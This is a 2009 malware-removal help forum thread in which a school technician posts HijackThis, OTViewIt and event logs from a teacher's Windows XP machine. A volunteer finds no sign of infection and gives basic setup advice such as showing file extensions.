Error - 4/2/2009 2:44:41 PM | Computer Name = 001_23_TEACHER | Source = MSSQL$MSSMLBIZ | ID = 17204
Description = FCB::Open failed: Could not open file c:\Program Files\Microsoft SQL
Server\MSSQL.1\MSSQL\DATA\mastlog.ldf for file number 2. OS error: 5(Access is
denied.).

[ System Events ]
Error - 4/2/2009 1:21:57 PM | Computer Name = 001_23_TEACHER | Source = SAVOnAccessControl | ID = 3997781
Description = File [...efetch\Layout.ini]'s scan succeeded following a timeout/busy
condition - it is being logged in case it contributed to that condition. Process
svchost.exe, (start check timestamp [ 1c9b3b63c997a88]).

Error - 4/2/2009 1:21:57 PM | Computer Name = 001_23_TEACHER | Source = SAVOnAccessControl | ID = 3997781
Description = File [...vers\etc\services]'s scan succeeded following a timeout/busy
condition - it is being logged in case it contributed to that condition. Process
spoolsv.exe, (start check timestamp [ 1c9b3b682517e54]).

Error - 4/2/2009 1:21:57 PM | Computer Name = 001_23_TEACHER | Source = SAVOnAccessControl | ID = 3997781
Description = File [...uction\CPS\hh.exe]'s scan succeeded following a timeout/busy
condition - it is being logged in case it contributed to that condition. Process
MsMpEng.exe, (start check timestamp [ 1c9b3b780bcae50]).

Error - 4/2/2009 1:21:57 PM | Computer Name = 001_23_TEACHER | Source = SAVOnAccessControl | ID = 3997781
Description = File [...ponentManager.dll]'s scan succeeded following a timeout/busy
condition - it is being logged in case it contributed to that condition. Process
ManagementAgent, (start check timestamp [ 1c9b3b780b7e99c]).

Error - 4/2/2009 1:21:57 PM | Computer Name = 001_23_TEACHER | Source = SAVOnAccessControl | ID = 3997781
Description = File [...S\ikvm-native.dll]'s scan succeeded following a timeout/busy
condition - it is being logged in case it contributed to that condition. Process
MsMpEng.exe, (start check timestamp [ 1c9b3b78695f318]).

Error - 4/2/2009 1:21:57 PM | Computer Name = 001_23_TEACHER | Source = SAVOnAccessControl | ID = 3997781
Description = File [...oUpdate\ALsvc.exe]'s scan succeeded following a timeout/busy
condition - it is being logged in case it contributed to that condition. Process
ALsvc.exe, (start check timestamp [ 1c9b3b7867e1b94]).

Error - 4/2/2009 1:21:57 PM | Computer Name = 001_23_TEACHER | Source = SAVOnAccessControl | ID = 3997781
Description = File [...date\swlocale.dll]'s scan succeeded following a timeout/busy
condition - it is being logged in case it contributed to that condition. Process
ALsvc.exe, (start check timestamp [ 1c9b3b786b75404]).

Error - 4/2/2009 1:21:57 PM | Computer Name = 001_23_TEACHER | Source = SAVOnAccessControl | ID = 3997781
Description = File [...tem32\sensapi.dll]'s scan succeeded following a timeout/busy
condition - it is being logged in case it contributed to that condition. Process
ALsvc.exe, (start check timestamp [ 1c9b3b786c33fc6]).

Error - 4/2/2009 1:21:57 PM | Computer Name = 001_23_TEACHER | Source = SAVOnAccessControl | ID = 3997781
Description = File [...oUpdate\ALsvc.exe]'s scan succeeded following a timeout/busy
condition - it is being logged in case it contributed to that condition. Process
ALsvc.exe, (start check timestamp [ 1c9b3b786c8047a]).

Error - 4/2/2009 2:44:41 PM | Computer Name = 001_23_TEACHER | Source = Service Control Manager | ID = 7024
Description = The SQL Server (MSSMLBIZ) service terminated with service-specific
error 3417 (0xD59).


< End of report >

hijackthis
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 1:49:09 PM, on 4/2/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16791)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\ScanSoft\OmniPageSE2.0\OpwareSE2.exe
C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Sophos\AutoUpdate\ALMon.exe
C:\Program Files\Kodak\Kodak EasyShare software\bin\EasyShare.exe
C:\Program Files\Kodak\KODAK Software Updater\7288971\Program\Kodak Software Updater.exe
C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardTools.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\SMART Technologies Inc\SMART Board Software\Aware.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\SMART Technologies Inc\SMART Board Software\Marker.exe
C:\Program Files\Sophos\Sophos Anti-Virus\SAVAdminService.exe
C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardService.exe
C:\Program Files\Sophos\Remote Management System\ManagementAgentNT.exe
C:\Program Files\Sophos\AutoUpdate\ALsvc.exe
C:\Program Files\Sophos\Remote Management System\RouterNT.exe
c:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Lightspeed Systems\User Agent\UAService.exe
C:\Program Files\Sophos\Sophos Anti-Virus\sdcservice.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\WINDOWS\system32\wuauclt.exe
C:\HiJackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
O2 - BHO: &Yahoo! Toolbar Helper - {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: Sophos Web Content Scanner - {39EA7695-B3F2-4C44-A4BC-297ADA8FD235} - C:\Program Files\Sophos\Sophos Anti-Virus\SophosBHO.dll
O2 - BHO: SMART Notebook Download Plugin - {67BCF957-85FC-4036-8DC4-D4D80E00A77B} - C:\Program Files\SMART Technologies Inc\Notebook Software\NotebookPlugin.dll
O2 - BHO: Canon Easy Web Print Helper - {68F9551E-0411-48E4-9AAF-4BC42A6A46BE} - C:\Program Files\Canon\Easy-WebPrint\EWPBrowseLoader.dll
O2 - BHO: Java™ Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre6\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\3.1.807.1746\swg.dll
O2 - BHO: Java™ Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O2 - BHO: SingleInstance Class - {FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} - C:\Program Files\Yahoo!\Companion\Installs\cpn\YTSingleInstance.dll
O3 - Toolbar: Easy-WebPrint - {327C2873-E90D-4c37-AA9D-10AC9BABA46C} - C:\Program Files\Canon\Easy-WebPrint\Toolband.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O4 - HKLM\..\Run: [igfxtray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [igfxhkcmd] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [igfxpers] C:\WINDOWS\system32\igfxpers.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\Run: [Windows Defender] "C:\Program Files\Windows Defender\MSASCui.exe" -hide
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [OpwareSE2] "C:\Program Files\ScanSoft\OmniPageSE2.0\OpwareSE2.exe"
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-18\..\Run: [DWQueuedReporting] "C:\PROGRA~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" -t (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [DWQueuedReporting] "C:\PROGRA~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" -t (User 'Default user')
O4 - Global Startup: AutoUpdate Monitor.lnk = C:\Program Files\Sophos\AutoUpdate\ALMon.exe
O4 - Global Startup: Kodak EasyShare software.lnk = C:\Program Files\Kodak\Kodak EasyShare software\bin\EasyShare.exe
O4 - Global Startup: Kodak software updater.lnk = C:\Program Files\Kodak\KODAK Software Updater\7288971\Program\Kodak Software Updater.exe
O4 - Global Startup: SMART Board Tools.lnk = C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardTools.exe
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\Office12\REFIEBAR.DLL
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/windowsupd...b?1207583621953
O16 - DPF: {CF40ACC5-E1BB-4AFF-AC72-04C2F616BCA7} (get_atlcom Class) - http://wwwimages.adobe.com/www.adobe.com/p...obat/nos/gp.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/flas...ent/swflash.cab
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = vview.edu
O17 - HKLM\Software\..\Telephony: DomainName = vview.edu
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = vview.edu
O20 - AppInit_DLLs: C:\PROGRA~1\Sophos\SOPHOS~1\SOPHOS~1.DLL
O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: dkab_device - Unknown owner - C:\WINDOWS\system32\DKabcoms.exe
O23 - Service: getPlus® Helper - NOS Microsystems Ltd. - C:\Program Files\NOS\bin\getPlus_HelperSvc.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: Kodak Camera Connection Software (KodakCCS) - Unknown owner - C:\WINDOWS\system32\drivers\KodakCCS.exe (file missing)
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\SYSTEM32\SPOOL\DRIVERS\W32X86\3\HPZipm12.exe
O23 - Service: Sophos Anti-Virus status reporter (SAVAdminService) - Sophos Plc - C:\Program Files\Sophos\Sophos Anti-Virus\SAVAdminService.exe
O23 - Service: Sophos Anti-Virus (SAVService) - Sophos Plc - C:\Program Files\Sophos\Sophos Anti-Virus\SavService.exe
O23 - Service: SMART Board Service - SMART Technologies Inc. - C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardService.exe
O23 - Service: SMART Web Server - Unknown owner - C:\Program Files\SMART Technologies Inc\SMART Board Software\WebServer.exe
O23 - Service: Sophos Agent - Sophos Plc - C:\Program Files\Sophos\Remote Management System\ManagementAgentNT.exe
O23 - Service: Sophos AutoUpdate Service - Sophos Plc - C:\Program Files\Sophos\AutoUpdate\ALsvc.exe
O23 - Service: Sophos Device Control Service - Sophos Plc - C:\Program Files\Sophos\Sophos Anti-Virus\sdcservice.exe
O23 - Service: Sophos Message Router - Sophos Plc - C:\Program Files\Sophos\Remote Management System\RouterNT.exe
O23 - Service: User Agent Service (UAService) - Lightspeed Systems - C:\Program Files\Lightspeed Systems\User Agent\UAService.exe

--
End of file - 10498 bytes

#4 Farbar

Posted 02 April 2009 - 02:05 PM

I don't see any description of the problem or any sign of infection.

#5 nightjar59

Posted 02 April 2009 - 02:07 PM

I am using a different username because the Teachers User Account will not run any programs.

#6 Farbar

Posted 02 April 2009 - 02:29 PM

We are not going to clean the user account you are logging in to, are we? In that account I see some problems, such as two antiviruses and some old Java that should be uninstalled, but no sign of infection.

First: I requested a full description of the problem.
Second: The instruction was to run those scanners in such a way that they run even when logged in as the infected user account.

So please log in and remove the downloaded and renamed program from the dreger's desktop.

#7 Farbar

Posted 02 April 2009 - 02:55 PM

Please don't miss my previous post.

Log in to the infected account.

Please set your system to show file extensions, as I see you renamed the file to powerpnt.exe.exe; it should be just powerpnt.exe:
  • Click Start, open Computer, select the Tools menu and click Folder Options.
  • Select the View Tab.
  • Uncheck: Hide file extensions for known file types
  • Click Apply and OK.
Then go on with steps 2 and 3.

Edited by farbar, 02 April 2009 - 02:55 PM.


#8 nightjar59

Posted 02 April 2009 - 03:03 PM

Had to get another infected machine because the teachers machine will not run any programs........

otviewit
OTViewIt logfile created on: 4/2/2009 2:57:43 PM - Run
OTViewIt by OldTimer - Version 1.0.21.0 Folder = C:\Documents and Settings\administrator.VVIEW\Desktop
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 7.0.5730.13)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

1.99 Gb Total Physical Memory | 1.30 Gb Available Physical Memory | 65.48% Memory free
3.84 Gb Paging File | 3.31 Gb Available in Paging File | 86.22% Paging File free
Paging file location(s): C:\pagefile.sys 2046 4092;

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 74.50 Gb Total Space | 61.36 Gb Free Space | 82.37% Space Free | Partition Type: NTFS
Drive D: | 64.77 Mb Total Space | 0.00 Mb Free Space | 0.00% Space Free | Partition Type: CDFS
Drive E: | 1.86 Gb Total Space | 0.15 Gb Free Space | 8.30% Space Free | Partition Type: FAT
F: Drive not present or media not loaded
G: Drive not present or media not loaded
H: Drive not present or media not loaded
I: Drive not present or media not loaded

Computer Name: 103_LIB_S3
Current User Name: Administrator
Logged in as Administrator.

Current Boot Mode: Normal
Scan Mode: All users
Whitelist: On
File Age = 60 Days

========== Processes ==========

[2006/11/03 19:19:58 | 00,013,592 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Defender\MsMpEng.exe
[2008/09/24 15:52:08 | 00,098,304 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\SavService.exe
[2008/02/18 11:16:30 | 00,110,592 | ---- | M] (Apple, Inc.) -- C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
[2008/01/11 17:50:16 | 00,030,312 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
[2007/07/24 15:17:08 | 00,229,376 | ---- | M] (Apple Inc.) -- C:\Program Files\Bonjour\mDNSResponder.exe
[2009/03/09 05:19:15 | 00,152,984 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files\Java\jre6\bin\jqs.exe
[2003/06/19 23:25:00 | 00,322,120 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
[2008/10/27 09:14:03 | 00,069,632 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\SAVAdminService.exe
[2007/11/02 05:48:32 | 01,283,336 | ---- | M] (SMART Technologies Inc.) -- C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardService.exe
[2009/04/02 05:00:20 | 00,266,240 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Remote Management System\ManagementAgentNT.exe
[2009/01/28 07:24:29 | 00,172,032 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\AutoUpdate\ALsvc.exe
[2009/04/02 05:00:16 | 00,794,624 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Remote Management System\RouterNT.exe
[2008/11/24 22:31:08 | 00,239,968 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
[2008/11/24 22:31:12 | 00,087,904 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
[2008/08/07 14:48:30 | 00,192,512 | ---- | M] (Lightspeed Systems) -- C:\Program Files\Lightspeed Systems\User Agent\UAService.exe
[2009/04/02 05:00:33 | 00,393,216 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\sdcservice.exe
[2008/11/24 22:31:10 | 29,263,712 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
[2008/10/16 15:09:44 | 00,051,224 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\wuauclt.exe
[2004/10/14 14:42:54 | 01,404,928 | ---- | M] (Analog Devices, Inc.) -- C:\Program Files\Analog Devices\Core\smax4pnp.exe
[2005/10/14 14:46:34 | 00,077,824 | ---- | M] (Intel Corporation) -- C:\WINDOWS\system32\hkcmd.exe
[2005/10/14 14:50:30 | 00,114,688 | ---- | M] (Intel Corporation) -- C:\WINDOWS\system32\igfxpers.exe
[2008/01/11 22:16:38 | 00,039,792 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe
[2006/11/03 19:20:12 | 00,866,584 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Defender\MSASCui.exe
[2008/03/30 10:36:40 | 00,267,048 | ---- | M] (Apple Inc.) -- C:\Program Files\iTunes\iTunesHelper.exe
[2004/07/27 16:50:18 | 00,081,920 | ---- | M] (InstallShield Software Corporation) -- C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe
[2006/10/20 17:23:38 | 00,118,784 | ---- | M] (CyberLink Corp.) -- C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe
[2008/05/08 06:24:44 | 00,155,648 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\wscript.exe
[2009/03/09 05:19:17 | 00,148,888 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files\Java\jre6\bin\jusched.exe
[2009/03/05 16:07:20 | 02,260,480 | RHS- | M] (Safer-Networking Ltd.) -- C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
[2009/01/28 07:24:29 | 00,245,760 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\AutoUpdate\ALMon.exe
[2007/11/02 05:48:46 | 04,519,176 | ---- | M] (SMART Technologies Inc.) -- C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardTools.exe
[2007/11/02 05:48:34 | 02,090,248 | ---- | M] (SMART Technologies Inc.) -- C:\Program Files\SMART Technologies Inc\SMART Board Software\Aware.exe
[2007/11/02 05:48:40 | 03,990,792 | ---- | M] (SMART Technologies Inc.) -- C:\Program Files\SMART Technologies Inc\SMART Board Software\Marker.exe
[2008/03/30 10:36:30 | 00,504,104 | ---- | M] (Apple Inc.) -- C:\Program Files\iPod\bin\iPodService.exe
[2009/04/02 13:33:26 | 00,422,912 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\administrator.VVIEW\desktop\powerpnt.exe.exe

========== (O23) Win32 Services ==========

[2008/02/18 11:16:30 | 00,110,592 | ---- | M] (Apple, Inc.) -- C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe -- (Apple Mobile Device [Auto | Running])
[2007/10/24 01:47:22 | 00,033,800 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe -- (aspnet_state [On_Demand | Stopped])
[2008/01/11 17:50:16 | 00,030,312 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe -- (BcmSqlStartupSvc [Auto | Running])
[2007/07/24 15:17:08 | 00,229,376 | ---- | M] (Apple Inc.) -- C:\Program Files\Bonjour\mDNSResponder.exe -- (Bonjour Service [Auto | Running])
[2007/10/24 01:47:40 | 00,070,144 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32 [On_Demand | Stopped])
[2005/08/10 16:58:18 | 00,491,520 | ---- | M] () -- C:\WINDOWS\system32\DKabcoms.exe -- (dkab_device [On_Demand | Stopped])
[2007/10/09 12:58:12 | 00,036,864 | ---- | M] (Microsoft Corporation) -- c:\WINDOWS\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe -- (FontCache3.0.0.0 [On_Demand | Stopped])
[2007/10/11 09:55:10 | 00,864,256 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe -- (idsvc [Unknown | Stopped])
[2008/03/30 10:36:30 | 00,504,104 | ---- | M] (Apple Inc.) -- C:\Program Files\iPod\bin\iPodService.exe -- (iPod Service [On_Demand | Running])
[2009/03/09 05:19:15 | 00,152,984 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files\Java\jre6\bin\jqs.exe -- (JavaQuickStarterService [Auto | Running])
[2003/06/19 23:25:00 | 00,322,120 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE -- (MDM [Auto | Running])
[2008/11/24 22:31:10 | 29,263,712 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe -- (MSSQL$MSSMLBIZ [On_Demand | Running])
[2008/11/24 22:31:08 | 00,045,408 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\90\Shared\sqladhlp90.exe -- (MSSQLServerADHelper [Disabled | Stopped])
[2007/10/11 09:55:14 | 00,122,880 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe -- (NetTcpPortSharing [Disabled | Stopped])
[2007/08/24 03:19:12 | 00,443,776 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE -- (odserv [On_Demand | Stopped])
[2006/10/26 14:03:08 | 00,145,184 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE -- (ose [On_Demand | Stopped])
[2008/10/27 09:14:03 | 00,069,632 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\SAVAdminService.exe -- (SAVAdminService [Unknown | Running])
[2008/09/24 15:52:08 | 00,098,304 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\SavService.exe -- (SAVService [Unknown | Running])
[2007/11/02 05:48:32 | 01,283,336 | ---- | M] (SMART Technologies Inc.) -- C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardService.exe -- (SMART Board Service [Auto | Running])
[2007/11/02 05:48:58 | 00,767,240 | ---- | M] () -- C:\Program Files\SMART Technologies Inc\SMART Board Software\WebServer.exe -- (SMART Web Server [On_Demand | Stopped])
[2009/04/02 05:00:20 | 00,266,240 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Remote Management System\ManagementAgentNT.exe -- (Sophos Agent [Auto | Running])
[2009/01/28 07:24:29 | 00,172,032 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\AutoUpdate\ALsvc.exe -- (Sophos AutoUpdate Service [Auto | Running])
[2009/04/02 05:00:33 | 00,393,216 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\sdcservice.exe -- (Sophos Device Control Service [Unknown | Running])
[2009/04/02 05:00:16 | 00,794,624 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Remote Management System\RouterNT.exe -- (Sophos Message Router [Auto | Running])
[2008/11/24 22:31:08 | 00,239,968 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe -- (SQLBrowser [Auto | Running])
[2008/11/24 22:31:12 | 00,087,904 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe -- (SQLWriter [Auto | Running])
[2008/08/07 14:48:30 | 00,192,512 | ---- | M] (Lightspeed Systems) -- C:\Program Files\Lightspeed Systems\User Agent\UAService.exe -- (UAService [Auto | Running])
[2006/11/03 19:19:58 | 00,013,592 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend [Auto | Running])
[2006/10/18 20:05:24 | 00,913,408 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Media Player\wmpnetwk.exe -- (WMPNetworkSvc [On_Demand | Stopped])

========== Driver Services ==========

[2005/03/17 16:30:10 | 00,132,608 | ---- | M] (Broadcom Corporation) -- C:\WINDOWS\system32\drivers\b57xp32.sys -- (b57w2k [On_Demand | Running])
[2004/12/13 16:14:00 | 00,039,904 | ---- | M] (Adaptec, Inc.) -- C:\WINDOWS\System32\drivers\cercsr6.sys -- (cercsr6 [Boot | Stopped])
[2008/01/29 12:01:28 | 00,016,168 | ---- | M] (GEAR Software Inc.) -- C:\WINDOWS\system32\drivers\GEARAspiWDM.sys -- (GEARAspiWDM [On_Demand | Running])
[2005/10/14 15:15:18 | 01,302,812 | ---- | M] (Intel Corporation) -- C:\WINDOWS\system32\drivers\ialmnt5.sys -- (ialm [On_Demand | Running])
[2008/04/14 00:09:50 | 00,014,592 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\drivers\kbdhid.sys -- (kbdhid [System | Running])
[2007/04/02 16:02:02 | 00,072,576 | ---- | M] (Mars Semiconductor Corp.) -- C:\WINDOWS\system32\drivers\marsqx5.sys -- (marsqx5 [On_Demand | Stopped])
[2004/08/04 05:00:00 | 00,017,792 | ---- | M] (Parallel Technologies, Inc.) -- C:\WINDOWS\system32\drivers\ptilink.sys -- (Ptilink [On_Demand | Running])
[2009/02/26 06:02:37 | 00,110,848 | ---- | M] (Sophos Plc) -- C:\WINDOWS\system32\drivers\savonaccesscontrol.sys -- (SAVOnAccessControl [System | Running])
[2009/02/26 06:02:48 | 00,038,528 | ---- | M] (Sophos Plc) -- C:\WINDOWS\system32\drivers\savonaccessfilter.sys -- (SAVOnAccessFilter [System | Running])
